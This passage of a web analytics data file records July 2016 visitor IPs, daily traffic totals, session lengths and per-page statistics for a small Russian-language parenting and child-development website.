88.81.37.245 2 11 208311 20160702140309
95.80.87.152 0 1 323923 
66.102.8.184 1 10 224290 20160718211046
94.180.141.50 1 13 240323 20160708084417
46.188.61.8 0 1 228 
178.120.214.29 0 1 43628 
152.174.255.51 0 3 26484 
66.102.9.8 0 1 158647 
94.178.118.142 0 1 342543 
217.23.187.128 0 1 39840 
66.249.93.98 0 2 317294 
147.30.161.218 0 1 323913 
50.193.207.49 1 1 17773 20160722000407
93.80.63.183 2 26 480646 20160719122526
101.78.146.106 0 4 28011 
182.64.211.240 0 3 26484 
177.4.207.225 0 3 26484 
91.205.161.80 0 1 121097 
128.70.161.237 0 1 70789 
109.195.239.210 0 2 62036 
46.185.6.237 0 3 26484 
46.133.63.19 0 1 129624 
37.146.194.55 1 13 240323 20160713102107
212.3.105.188 0 1 239041 
212.96.109.41 0 1 39840 
178.206.143.228 0 1 39840 
95.220.46.254 0 1 112150 
62.176.13.203 0 1 55460 
95.59.53.91 0 1 98068 
65.158.22.67 0 3 26484 
176.193.84.197 0 1 228 
109.68.236.56 0 1 39840 
79.177.191.211 0 12 468535 
194.58.184.120 0 1 20995 
85.140.3.200 0 1 186984 
195.64.208.240 0 1 30300 
213.87.150.243 0 1 43628 
176.108.185.3 0 1 31736 
95.25.117.100 0 1 166514 
185.3.35.99 0 1 55460 
85.192.188.189 0 1 58578 
46.187.58.85 0 1 25936 
89.238.200.194 0 3 26484 
82.116.54.92 0 1 16220 
89.107.183.7 0 1 8486 
5.228.155.74 0 1 121097 
46.188.4.38 0 1 71621 
46.71.80.243 0 3 118071 
95.54.244.40 0 1 31736 
178.35.25.180 0 1 186984 
78.25.123.87 0 1 121097 
213.226.59.31 0 1 121097 
212.94.25.107 0 1 39840 
95.71.46.243 1 1 18293 20160724234401
72.27.121.52 0 3 26484 
193.46.86.222 1 3 20657 20160707061942
217.76.76.76 0 1 31736 
62.183.85.225 0 1 186984 
167.114.228.206 1 1 17773 20160707010424
85.117.127.208 0 1 126457 
93.171.9.20 0 1 342543 
46.146.18.187 0 1 26782 
217.118.64.59 0 1 31736 
193.200.18.102 0 1 342543 
109.156.187.232 0 1 31736 
159.203.4.15 1 1 17773 20160723143242
94.180.129.87 1 13 240323 20160707051924
176.60.43.41 0 2 150574 
81.94.192.233 1 1 17773 20160722082814
95.221.206.19 1 31 3319622 20160719031811
178.137.85.216 1 1 16538 20160704154031
176.59.35.92 0 1 82267 
195.3.246.87 0 1 70789 
176.77.41.242 1 5 33826 20160701120619
185.40.159.142 0 1 31736 
91.229.206.233 0 1 143168 
94.181.180.178 4 55 987776 20160727135544
92.100.248.172 0 1 19741 
176.193.101.10 0 1 2656 
5.141.125.63 2 2 63760 20160719232919
81.177.127.253 0 1 272579 
199.16.140.28 0 3 26484 
198.20.69.98 1 1 17773 20160720152903
108.220.73.74 0 3 26484 
195.239.54.254 0 1 338729 
176.60.43.31 0 1 76479 
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 31
20160701 12 92 3321117 11
20160702 11 89 2576765 10
20160703 0 21 901302 0
20160704 9 67 4077381 8
20160705 16 108 4826868 13
20160706 9 92 23088535 9
20160707 17 118 4457947 15
20160708 12 85 4692180 10
20160709 5 48 2996908 5
20160710 8 82 4792019 6
20160711 20 116 5245690 10
20160712 6 83 2904252 5
20160713 13 143 5047813 12
20160714 10 120 6484640 7
20160715 5 74 2387407 5
20160716 7 42 1727420 5
20160717 5 45 3127909 4
20160718 9 89 5141673 8
20160719 88 313 15390576 27
20160720 12 140 9505005 11
20160721 13 97 7368879 10
20160722 11 79 6088964 9
20160723 7 73 3699985 6
20160724 12 106 5939445 9
20160725 11 80 5141726 10
20160726 5 57 4093560 4
20160727 5 71 4080032 5
20160728 4 44 2375697 4
20160729 16 103 2946355 5
20160730 21 213 23811244 9
20160731 10 104 7057868 9
END_DAY

# Session range - Number of visits
BEGIN_SESSION 2
30s-2mn 2
0s-30s 259
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 10 first Pages must be first (order not required for others)
BEGIN_SIDER 56
/ 218 3874514 170 172
/pregnancy-index.html 14 362782 7 7
/useful/pdd.html 14 121674 12 12
/mychild/child-01.html 11 121616 11 11
/useful.html 8 192344 0 0
/wp-articles/article-22.html 7 132076 2 3
/wp-articles/podgotovka_k_rodam.html 7 115626 0 0
/mychild/child-18.html 7 141673 1 1
/my-child.html 7 137571 0 0
/wp-articles/article-23.html 7 115731 0 0
/wp-articles/article-7.html 1 20154 1 1
/wp-articles/article-18.html 1 19210 1 1
/privacy-policy.html 5 78510 0 0
/mychild/child-12.html 1 14919 1 1
http://www.elong.com/ 1 17773 0 1
/mychild/child-13.html 3 95640 3 3
/wp-articles/article-16.html 3 49614 3 2
http://www.google.com/ 1 17773 1 1
/mychild/child-16.html 6 109758 2 3
/useful/risovanie.html 3 26478 3 3
http://www.qyer.com/ 2 35546 2 1
/mychild/child-17.html 4 36052 0 0
/useful/uchim-chitat.html 1 8470 0 0
/useful/disney1.html 1 8613 0 0
http://www.qunar.com/ 4 71092 4 3
/useful/chto-v-roddom.html 4 65812 4 3
/useful/disney6.html 2 17330 1 1
/wp-articles/article-12.html 2 60774 2 2
/useful/zanimatelnie_kartochki.html 1 10946 0 0
/wp-articles/article-5.html 1 16677 1 0
/wp-articles/article-13.html 1 17297 1 1
/mychild/child-02.html 1 21604 1 1
/useful/dorisuy_raskras.html 4 40312 0 0
/wp-articles/article-19.html 2 41198 2 2
/useful/krosh.html 1 8431 1 0
http://www.ctrip.com/ 1 17773 1 1
/favicon/manifest.json 4 2880 0 4
/wp-articles/article-17.html 2 32766 2 0
http://www.google.com 2 35546 2 2
/mychild/child-09.html 1 42752 1 1
/wp-articles/article-9.html 1 15555 1 1
http://httpheader.net/ 3 53319 3 3
http://www.babaip.com/ 1 17773 1 1
/mychild/child-03.html 2 47406 2 2
/useful/didakt_kart.html 2 17918 0 0
/wp-articles/article-1.html 1 17956 1 1
/googlef1fe4ac4b6cb4d52.html 2 106 2 2
/useful/disney3.html 1 8941 0 0
/wp-articles/article-20.html 3 87927 3 2
/mychild/child-06.html 1 21958 1 0
/mychild/child-10.html 1 13220 1 1
/useful/how-boy-girl.html 1 10269 1 1
/useful/doman-video.html 1 10442 1 1
/useful/azbuka.html 1 13280 1 1
http://www.mafengwo.cn/ 1 17773 0 1
/useful/ezhik.html 1 8925 0 0
END_SIDER
